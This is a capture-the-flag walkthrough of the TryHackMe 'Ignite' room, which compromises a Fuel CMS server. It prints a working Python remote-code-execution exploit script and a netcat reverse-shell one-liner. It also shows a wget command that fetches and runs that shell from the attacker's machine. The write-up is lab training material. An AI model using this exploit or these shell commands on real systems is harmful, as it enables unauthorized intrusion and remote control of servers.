# Ignite

[Ignite](https://www.tryhackme.com/room/ignite)

Recognition

### NMAP

> nmap -sCV -A -O 10.10.226.192

```
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/fuel/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to FUEL CMS
```

### Site

[![image](https://user-images.githubusercontent.com/53917092/97047048-bb5d0500-154e-11eb-9d20-36f4418aec03.png)](https://user-images.githubusercontent.com/53917092/97047048-bb5d0500-154e-11eb-9d20-36f4418aec03.png)

[![image](https://user-images.githubusercontent.com/53917092/97047124-d92a6a00-154e-11eb-890b-a2e6fc7d34ca.png)](https://user-images.githubusercontent.com/53917092/97047124-d92a6a00-154e-11eb-890b-a2e6fc7d34ca.png)

#### Visiting /fuel

we have a login page

[![image](https://user-images.githubusercontent.com/53917092/97047273-155dca80-154f-11eb-84ce-b39629091079.png)](https://user-images.githubusercontent.com/53917092/97047273-155dca80-154f-11eb-84ce-b39629091079.png)

So I searched about this system (fuel cms) on the exploitdb site and found this:

![](https://user-images.githubusercontent.com/53917092/97047803-e3993380-154f-11eb-95d2-cf25f25b5bac.png)

I will use the RCE Exploit because other else requires authentication and we don't have any credentials

the exploit be like

```

import requests
import urllib

url = raw_input('target (http://IP:PORT) : ')
def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
	xxxx = raw_input('cmd:')
	burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
	r = requests.get(burp0_url)

	html = ""
	htmlcharset = r.text.find(html)

	begin = r.text[0:20]
	dup = find_nth_overlapping(r.text,begin,2)

	print r.text[0:dup]
```

and it uses python2

### Exploiting

![](https://user-images.githubusercontent.com/53917092/97048985-4e973a00-1551-11eb-99fa-5cbcd09522a4.png)

## getting a reverse shell

using the RCE we check that the machine has WGET command

[![image](https://user-images.githubusercontent.com/53917092/97049144-91591200-1551-11eb-869f-77e1d309f88e.png)](https://user-images.githubusercontent.com/53917092/97049144-91591200-1551-11eb-869f-77e1d309f88e.png)

so I will use this to download and run a reverse shell file

so I created a .sh file on my machine that contains it:

> rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f

and to access the machine, I used a python server

> nc -lvp PORT

> python3 -m http.server 80

![image](https://user-images.githubusercontent.com/53917092/97050038-0c6ef800-1553-11eb-8d9e-7a41cee2fbdf.png)

now I will download the file and run it in the box using RCE

> wget IP/revshell.sh -O /tmp/revshell.sh; sh /tmp/revshell.sh

![](https://user-images.githubusercontent.com/53917092/97050364-97e88900-1553-11eb-8070-f63957ed97fd.png)

![](https://user-images.githubusercontent.com/53917092/97050414-af277680-1553-11eb-9c0a-82eb8efaedfa.png)

it works

### getting a tty

checking if we have python

> whereis python

[![image](https://user-images.githubusercontent.com/53917092/97050672-2d841880-1554-11eb-8c26-34b715bb5ed8.png)](https://user-images.githubusercontent.com/53917092/97050672-2d841880-1554-11eb-8c26-34b715bb5ed8.png)

we have python, so we will use it to get a tty

> python -c 'import pty;pty.spawn("/bin/bash")'

![](https://user-images.githubusercontent.com/53917092/97050816-6de39680-1554-11eb-884c-304bdb41cec8.png)

### User Flag

![](https://user-images.githubusercontent.com/53917092/97051978-8f458200-1556-11eb-9655-5c6aef004e72.png)

### Privilege escalation

again using wget, we will use LinPeas to enumerate possible privilege escalation vectors

we will download on our machine, upload a server and then download in the box through our machine

in our machine:

> wget <https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh>

> python3 -m http.server 80

in the box

> cd /tmp

> wget \<your\_IP>/linpeas.sh

giving the permissions

> chmod +x linpeas.sh

running

> ./linpeas.sh

### Privilege Escalation

![](https://user-images.githubusercontent.com/53917092/97056470-768d9a00-155f-11eb-8d24-a72a0fcd1d02.png)

checking out this database

![](https://user-images.githubusercontent.com/53917092/97056626-d08e5f80-155f-11eb-9b0f-9815f51646ee.png)

![](https://user-images.githubusercontent.com/53917092/97056655-e1d76c00-155f-11eb-9ff1-a64e376d405c.png)

trying using this password

![](https://user-images.githubusercontent.com/53917092/97056752-177c5500-1560-11eb-84bf-9bac6799a1f9.png)

### ROOT flag

![](https://user-images.githubusercontent.com/53917092/97056937-8659ae00-1560-11eb-803b-ccae406fa5ab.png)

that's it, thanks for reading